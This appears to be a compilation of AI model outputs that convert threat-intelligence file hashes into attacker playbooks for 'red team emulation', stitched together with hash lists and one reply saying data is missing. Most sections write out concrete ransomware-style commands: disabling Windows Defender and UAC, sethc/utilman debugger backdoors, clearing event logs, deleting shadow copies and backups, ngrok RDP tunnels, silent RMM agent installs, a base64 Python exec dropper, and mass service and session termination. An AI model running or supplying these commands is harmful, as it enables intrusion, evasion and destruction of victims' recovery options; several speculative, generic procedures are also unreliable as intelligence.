3c1853831958efe2cc78ea82b4fbd565 dc14cffa48dd95157fd381cb75bae1773d510c54 512beb7dfa9fdbc8be7fbf59c7bec7911296f9e36c8a3d3b95e7aef4a88bf09c backup.bat 91be6e6a8b4c2cb99db5b99d40e06978 86f599090aa2c7c1df65dccccf00e1818e72246a beb5022543a1e12e1f8f5ffe5d520e5fc9cf623aea512cfb43ea2f8c2897420c clearlog.bat f7a730acc86f1d6759249ccc579b1794 fe1fb1da6435a6d6283e993569d3fc82a67d7ac8 09f91e90a1604a633c00d6039581f552603421356cb1edb62e085b32ff01b94e cmd.cmd 5336dffb778b1e2a0b982b337652b213 bd65b5306914187f14bfffa995e7e68a8d036d0c 4106ce787cf73d7f8215311a241f0e42426301a5a2078da9e3349afade2df684 def1.bat 1393dab192ea2e2427889839a2d8fcf7 373609c0f30ee313fd0cc6c4e572452483d87244 0e626e01d3ae7840aa486468f40138284ccbd70dfe336a6b5d4008d01eb79988 defendermalwar.bat 1365640fc3c0e1824e348956172caed7 300c89889bbb5ef61f470174a6fcad73c4516779 5b43428452a867ad61554d763c8f19ca4cd8af8c31194304785e9e45f9258441 delbackup.bat a8b335886e39adf23e6aa44a00bf82dc 2de53c24663149366fca22f354aff5c0f5b348f4 6cff22a3ea7c054075b9aded5933587bf997623183539e10e426d103d604f046 disable.bat cc35c94e64830ff143b54783c9869ecf 4a8a4e6069ec4f6a4f24614eb885c57484bc9b79 fdc105ae79dff83f31777c6e047272c5b372251a3af49e20370e7ee9d1c70763 hyp.bat

Phase: Execution

• Technique: Batch Script Execution
• Procedure: Execute several batch files likely associated with malicious activities.

Phase: Persistence

• Technique: Scheduled Task Creation
• Command: Usage of batch files such as backup.bat or def1.bat could imply persistence mechanisms through scheduled tasks.

Phase: Defense Evasion

• Technique: Log Clearing

• Command: Execution of clearlog.bat to remove event logs to evade detection.

• Technique: Disabling Security Tools

• Command: Execution of disable.bat potentially used to turn off security features.

• Technique: Disabling Backups

• Command: Execution of delbackup.bat to delete backup files, likely to prevent recovery.

Phase: Impact

• Technique: Anti-Forensic Measures
• Command: defendermalwar.bat may indicate attempts to interfere with or disable antivirus/antimalware utilities.

Phase: Command and Control

• Technique: Remote Command Execution
• Command: Execution of cmd.cmd for command-line access to maintain control over compromised systems.

Ensure that each batch file's specific contents and effects are emulated to accurately simulate the threat actor's behavior.

d1e3216cf698a58832d947d95dc4f3f8 1224f9667d7f1d3b7fba17f414d343912bec03db 08d40a402b3754e52e4e86003bffddfdccbceefd335f53591f4cf715f8d30321 LOGOFALL.bat 9a66570b7e25035ff337fa6098f59823 a65d7caf354161798d2458cfee9e4e988f0e94af 03b3c37300bf9dcfaa4594e86841b70263324dda305484fb268b27deb09f936c LOGOFALL1.bat c84e1655f0ba917cc605018e32eba9f3 7dee2a38cc2ba81cc373b50f42c8946601d177cb 3691dbb1834db4eb8ef4c195d26779b87db267a56f2ebca6c146a53fb8adb9c0 native_dropper 444d7a27ac0327ccc0cf4e75a32025c9 8441e7b6b6b9f24439e71c6b031262bc76d73c28 039bf780ae46875945344af489a590c5b7a36d458372a3173b55b3dc3559dfff NG1.bat aae5ca4d0e7f000ba5f5250caaed0a05 d08878d7dffe082a908a4bb6387b4739c1a9d3eb 7e623f907b4a4c924cd8af3bf4b8df45b6f904723cbb26ec87cfe7792388afe1 NG2.bat 1a4e569f50695f53bd2368cc322a792d 0a99bd83472444e1bfdd53385fbf2e95bb6dbab9 d97e2e5e6b23ee0f1efa7326d7ac3240a0df9770bf7c2992eec890f073c9cada ngrok.exe e2eadf60d8f25cae9b29decab461177b cecc54143cc375af1b9aed0021643b179574e592 1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386 ON.bat 8c7c782df59edd61aabbc510d7747b11 66ac6cf4bb4247daf1d09d9d4bc4e357cc39c6c8 b0056bef817408449470d3fa43e13cbc89cabdae795b1dc8cbe9905c5946f530 Posh_v2_dropper_x64.exe

I'm sorry, but the data provided doesn't seem to include the necessary details related to command-line executions or explicit procedures used by a threat actor. Please provide sections of a CTI report or other related details for analysis.

a5748047ebbe34d7821a2a040e4ca54e 55126d8215b771aa2f62f16e6aad9e8832824a4c 63229da1bed0c0eafc4ed087651af3eec521e7fbd098300f7d862582d03a675d py_dropper.sh 679d0dab79a98da8e20351f9f887e4f2 9442647283e52c91c2e836b19749f184936cf6c2 01ec91a3145332174eef9239f7767adaa5e3dff3a436dfb7d2f978f88ea6cd93 setup_uncnow.msi (Atera Remote Admin) c8903eb5763c670a15049d74d764188c 990f68cca516192d73ef443f51ed80813e324b0b 91d9c73b804aae60057aa93f4296d39ec32a01fe8201f9b73f979d9f9e4aea8b shadow.bat 4cf52cee2001cd10528f429fb6d9fd07 3cf331934996ec4338418b847b52d78d8a29d224 87ab1707a553557b10fa721a32f053fbb40d11de6f692e96e067d03316fe530b shadowGuru.bat 0f1290d014dfd9e66bbbed96a828f7d1 b8fc0194f6ed56e4a57c16756e506369c74c4078 2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 VmManagedSetup.exe (SystemBC proxy malware) 7ee103ee99b95c07cc4a024e4d0fdc03 885fc76ba1261a1dcce87f183a2385b2b99afd96 cc4960939a41d6a281ddad307b107e16214f4aeda261c9b5037f26e60dc7bba2 WILD_PRIDE.exe (Sliver C2) 6b44d99b258c275ee7fcf230da177f3e 833a461f6d479d164b453cc9f5f51259d991b1b7 1aecadf489a6dd7a3a6e5dfda9425673a9d04d38a5cb6b0b8f961536c11237ed z1.bat 97dc80d3844b01587d9fd6377b9ab0a7 93b717a562f2cc3fdf2355bd9d2670ba2391cc60 a668a98e57c03decf6ea76bb32f67f3f077ef2277e57f4117d44f4342977fddf z.bat

Phase: Initial Access

• Technique: Malicious Dropper Script Execution
• Procedure: The attacker uses a script named py_dropper.sh to introduce malicious payloads onto the target system.

Phase: Execution

• Technique: Scheduled Task Execution (Batch Scripts)
• Command: Execution of shadow.bat, shadowGuru.bat, z1.bat, and z.bat which likely contain commands for further actions such as reconnaissance, privilege escalation, or persistence.

Phase: Persistence

• Technique: MSI Installer for Remote Administration
• Command: Execution of setup_uncnow.msi to install Atera Remote Admin for maintaining persistence.

Phase: Lateral Movement

• Technique: Proxy Malware Deployment
• Command: Execution of VmManagedSetup.exe to deploy SystemBC proxy malware, enabling network and command control proxying.

Phase: Command and Control

• Technique: Sliver C2 Framework
• Command: Execution of WILD_PRIDE.exe to establish a command and control channel using the Sliver C2 framework.

Note: Specific commands and the contents of batch scripts are not detailed, as these would depend on the script contents, which are not provided.

fe00973fc12b3c6330abd9807dfb1d70 d2f5c890e3e1dd9b42e695586c06408b31d4ec7a 38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 MITRE Accessibility Features - T1546.008 Account Access Removal - T1531 Application Layer Protocol - T1071 Asymmetric Cryptography - T1573.002 Clear Windows Event Logs - T1070.001 Deobfuscate/Decode Files or Information - T1140 Disable or Modify Tools - T1562.001 Disable Windows Event Logging - T1562.002 Encrypted Channel - T1573 Inhibit System Recovery - T1490 Modify Registry - T1112 PowerShell - T1059.001 Proxy - T1090 Python - T1059.006 Registry Run Keys / Startup Folder - T1547.001 Remote Access Software - T1219 Service Stop - T1489 System Owner/User Discovery - T1033 Web Protocols - T1071.001 Windows Command Shell - T1059.003

Phase: Initial Access

• Technique: Phishing via Malicious Document
• Procedure: The attacker sends a phishing email containing a malicious document that, when opened, executes embedded scripts.

Phase: Execution

• Technique: PowerShell Execution

• Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden <Script>

• Technique: Python Execution

• Command: python <script.py>

• Technique: Windows Command Shell

• Command: cmd.exe /c <command>

Phase: Persistence

• Technique: Registry Run Keys / Startup Folder
• Command: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v <Name> /t REG_SZ /d <Executable>

Phase: Privilege Escalation

• Technique: Modify Registry
• Command: reg add <Registry Path> /v <Name> /t REG_DWORD /d <Value>

Phase: Defense Evasion

• Technique: Disable or Modify Tools

• Command: cmd.exe /c "sc config <ServiceName> start= disabled"

• Technique: Disable Windows Event Logging

• Command: cmd.exe /c wevtutil cl <LogName>

• Technique: Clear Windows Event Logs

• Command: wevtutil cl <LogName>

• Technique: Deobfuscate/Decode Files or Information

• Command: certutil -decode <encoded file> <decoded file>

Phase: Credential Access

• Technique: Remote Access Software
• Procedure: The attacker uses commercial or custom remote access software to capture credentials.

Phase: Discovery

• Technique: System Owner/User Discovery
• Command: whoami /user

Phase: Lateral Movement

• Technique: Application Layer Protocol
• Procedure: The actor uses applications like SMB or RDP for lateral movement.

Phase: Command and Control

• Technique: Encrypted Channel

• Procedure: The attacker establishes a C2 channel encrypted via SSL/TLS.

• Technique: Proxy

• Procedure: The attacker routes traffic through a proxy to obfuscate C2 communication.

• Technique: Web Protocols

• Procedure: The attacker uses web protocols like HTTP/HTTPS for data exfiltration or C2 communications.

Phase: Impact

• Technique: Inhibit System Recovery

• Command: bcdedit /set {default} recoveryenabled No

• Technique: Service Stop

• Command: net stop <ServiceName>

Model: gemini-2.0-flash

Phase: Execution

• Technique: Disable UAC and Modify Registry Settings
• Command: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0/f
• Technique: Registry modifications to enable Remote Desktop.
• Command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0/f
• Technique: Configure Windows Firewall to allow RDP traffic.
• Command: netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
• Technique: Backdoor accessibility features via Image File Execution Options (IFEO).
• Command: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"

Phase: Defense Evasion

• Technique: Disable Windows Defender.
• Command: REG ADD "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
• Technique: Adding volume paths as exclusion in Windows Defender using PowerShell
• Command: powershell.exe -noprofile -command Add-MpPreference -ExclusionPath "C:\
• Technique: Remove the systray icon access to Windows Defender
• Command: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
• Technique: Remove WD context menu
• Command: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
• Technique: Disable ETW logging/tracing
• Command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
• Technique: Disable Defender scheduled Tasks.
• Command: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
• Technique: Disable Windows automatic recovery features by modifying boot configuration data.
• Command: bcdedit /set {default} recoveryenabled No

Phase: Credential Access

• Technique: Dumping credentials via a clearlog.bat script
• Command: reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
• Command: reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

Phase: Discovery

• Technique: Enumerate current sessions
• Command: query session >session.txt

Phase: Lateral Movement

• Technique: Authenticate to a target to start a TCP tunnel using Ngrok
• Command: ngrok config add-authtoken <authtoken>
• Command: ngrok tcp 3389

Phase: Persistence

• Technique: Use SC command to make sure services start automatically.
• Command: sc config Dnscache start= auto

Phase: Impact

• Technique: Delete System State Backups
• Command: wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
• Technique: Delete shadow copies
• Command: vssadmin Delete Shadows /All /Quiet
• Technique: Delete system backups and backup catalogs
• Command: wbadmin DELETE BACKUP -keepVersions:0
• Technique: Delete volume shadow copies
• Command: wmic SHADOWCOPY DELETE
• Technique: Clear Windows Event Logs
• Command: wevtutil.exe cl
• Technique: Clear the recycle bin directory
• Command: rd /s /q %systemdrive%\$RECYCLE.BIN
• Technique: Shutdown critical services to disrupt operations
• Command: net stop <service_name>
• Technique: Delete services
• Command: sc delete <service_name>
• Technique: Use a combination of diskshadow and script commands to delete shadow copies
• Command: cmd.exe /C diskshadow -s sc.txt
• Technique: Log off current or other active RDP sessions
• Command: logoff <sessionID>
• Technique: Terminate specific processes running in a system
• Command: taskkill /f /im <process_name>.exe
• Technique: Run PowerShell commands to disable Realtime monitoring from Windows Defender.
• Command: powershell Set-MpPreference -DisableRealtimeMonitoring $true

Model: gemini-2.5-flash-preview-05-20

Here's a structured breakdown of the threat actor's procedures, excluding IOCs, for red team emulation:

Phase: Initial Access

The report describes finding an open directory and analysis of subsequent activities, but does not explicitly detail the initial access vector used by the threat actors.

Phase: Execution

• Technique: PowerShell Execution
• Procedure: Execution of encoded PowerShell commands.
• Command: powershell -exec bypass -Noninteractive -windowstyle hidden -e <Base64_Encoded_Command>
• Note: The decoded command includes downloading and executing further stages.
• Technique: Command and Scripting Interpreter (Windows Command Shell)
• Procedure: Execution of various batch scripts.
• Command Examples:
  • cmd.exe /C <batch_script_name> (e.g., for wbadmin, diskshadow)
  • Direct execution of batch scripts (e.g., atera_del.bat, backup.bat, clearlog.bat)
• Technique: Command and Scripting Interpreter (Bash Shell Script)
• Procedure: Execution of Python dropper via bash.
• Command: echo "import sys, base64; exec(base64.b64decode('<Base64_Encoded_Python_Script>'))" | python2 &

Phase: Persistence

• Technique: Accessibility Features Backdoor
• Procedure: Modify registry to replace accessibility tools (Sticky Keys, Magnifier, On-Screen Keyboard, Utilman) with cmd.exe to gain persistent system-level access from the logon screen.
• Command Examples:
  • REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"
  • REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"
  • REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"
  • REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"
• Technique: Registry Run Keys / Startup Folder (SystemBC)
• Procedure: Establish persistence by creating a Run key entry to execute SystemBC malware via PowerShell.
• Inferred Command (from C code snippet): powershell.exe -windowstyle hidden -Command "& '<PathToSelfExe>'" (This is the likely command executed by the malware's persistence mechanism)

Phase: Privilege Escalation

• Technique: Disable User Account Control (UAC)
• Procedure: Modify registry settings to disable UAC and alter prompt behavior for administrative users.
• Command Examples:
  • REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
  • REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v PromptOnSecureDesktop /t REG_DWORD /d 0 /f
  • REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
• Technique: Modify User Account (Creation and Group Membership)
• Procedure: Create a new user account and add it to the local Administrators group.
• Command Examples:
  • net user <AccountName> <Password> /add
  • net localgroup Administrators <AccountName> /add

Phase: Defense Evasion

• Technique: Clear Windows Event Logs
• Procedure: Clear all Windows event logs, recursively delete the recycle bin, and delete Remote Desktop Protocol (RDP) traces from registry and filesystem.
• Command Examples:
  • for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G") (calls wevtutil.exe cl %1 for each log)
  • rd /s /q %systemdrive%\$RECYCLE.BIN
  • reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
  • reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
  • attrib Default.rdp -s -h
  • del Default.rdp
• Technique: Disable or Modify Tools (Antivirus, Firewall, Security Features)
• Procedure: Disable and uninstall various antivirus/endpoint security services and features by modifying registry keys, stopping services, and uninstalling software.
• Command Examples:
  • reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  • reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  • reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f (and similar for other Defender features like Real-Time Protection, IOAV Protection, Behavior Monitoring, Spynet, Notifications)
  • powershell Uninstall-WindowsFeature -Name Windows-Defender
  • powershell restart-service WinDefend -Force
  • wmic product where "name like 'Malwarebytes%%'" call uninstall /nointeractive
  • sc delete "<AV_Service_Name>" (e.g., sc delete "WRSVC", sc delete "ekrn", sc delete "klim6")
  • reg delete "HKLM\SYSTEM\CurrentControlSet\services\<AV_Service_Name>" /f (for many AVs)
• Technique: Inhibit System Recovery (Delete Shadow Copies & Backups)
• Procedure: Delete system state and general backups, remove all shadow copies, and modify boot configuration to ignore failures, preventing system recovery.
• Command Examples:
  • wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
  • wbadmin DELETE BACKUP -keepVersions:0
  • wmic SHADOWCOPY DELETE
  • vssadmin Delete Shadows /All /Quiet
  • bcdedit /set {default} recoveryenabled No
  • bcdedit /set {default} bootstatuspolicy ignoreallfailures
  • diskshadow -s sc.txt (where sc.txt contains delete shadows all)
• Technique: Modify Registry
• Procedure: Extensive modification of registry keys for various purposes beyond UAC/AV evasion, such as enabling plaintext credential storage.
• Command Example: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
• Technique: Impair Defenses (Scheduled Tasks)
• Procedure: Disable scheduled tasks related to Windows Defender.
• Command Example: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable (and similar for other Defender tasks)

Phase: Discovery

• Technique: System Owner/User Discovery
• Procedure: List active user sessions on the system.
• Command: query session >session.txt

Phase: Lateral Movement

• Technique: Remote Desktop Protocol (Modification for Access)
• Procedure: Enable RDP connections and add firewall rules to allow incoming RDP traffic.
• Command Examples:
  • reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
• Technique: Network Share Creation
• Procedure: Create network shares for multiple disk drives with full access permissions for everyone.
• Command Example: net share c=c:\ /GRANT:Everyone,FULL (and similar for other drives)

Phase: Command and Control

• Technique: Proxy (Ngrok)
• Tool: ngrok.exe
• Procedure: Configure Ngrok to establish TCP tunnels for RDP, potentially for C2 traffic.
• Command Examples:
  • ngrok config add-authtoken <TOKEN>
  • ngrok tcp 3389
• Technique: Remote Monitoring and Management (RMM) Software
• Tool: Atera Agent (Setup_uncnow.msi)
• Procedure: Download and install the Atera Agent MSI.
• Command: curl -o setup.msi "https://<RMM_URL>/GetAgent/Msi/?customerId=<ID>&integratorLogin=<Email>&accountId=<ID>" && msiexec /i setup.msi /qn IntegratorLogin=<Email> CompanyId=1 AccountId=<ID>
• Technique: Standard Application Layer Protocol (PoshC2, Sliver, SystemBC)
• Tool: PoshC2 droppers (Posh_v2_dropper_x64.exe, native_dropper, py_dropper.sh), Sliver implant (WILD_PRIDE.exe), SystemBC (VmManagedSetup.exe)
• Procedure: Use C2 frameworks for command and control, leveraging various protocols and custom configurations.
• Note: The droppers are configured to beacon to specific C2 endpoints.

Phase: Impact

• Technique: Service Stop
• Procedure: Stop and disable numerous critical services, including those related to SQL, Exchange, Hyper-V, and various third-party applications, to disrupt operations and potentially prevent data recovery.
• Command Examples:
  • net stop <Service_Name> (e.g., net stop MSExchangeDelivery, net stop MSSQLSERVER, net stop WinDefend, net stop "IBM Domino Server")
  • sc config <Service_Name> start= disabled
  • sc delete "<Service_Name>" (e.g., sc delete "vmickvpexchange", sc delete "FirebirdServerDefaultInstance")
• Technique: Process Termination
• Procedure: Forcefully terminate processes associated with database services, security tools, and other applications.
• Command Examples:
  • taskkill -f -im sqlbrowser.exe (and similar for other SQL, AV processes)
  • TASKKILL /F /FI "PID ge 1000" /FI "WINDOWTITLE ne untitle*"
• Technique: Account Access Removal
• Procedure: Log off all active user sessions on the system, potentially disrupting legitimate user access.
• Command Examples:
  • for /f "skip=1 tokens=3," %%i in (session.txt) DO logoff %%i
  • for /L %%C in (0,1,20) do if "%%C" neq "%curID%" logoff %%C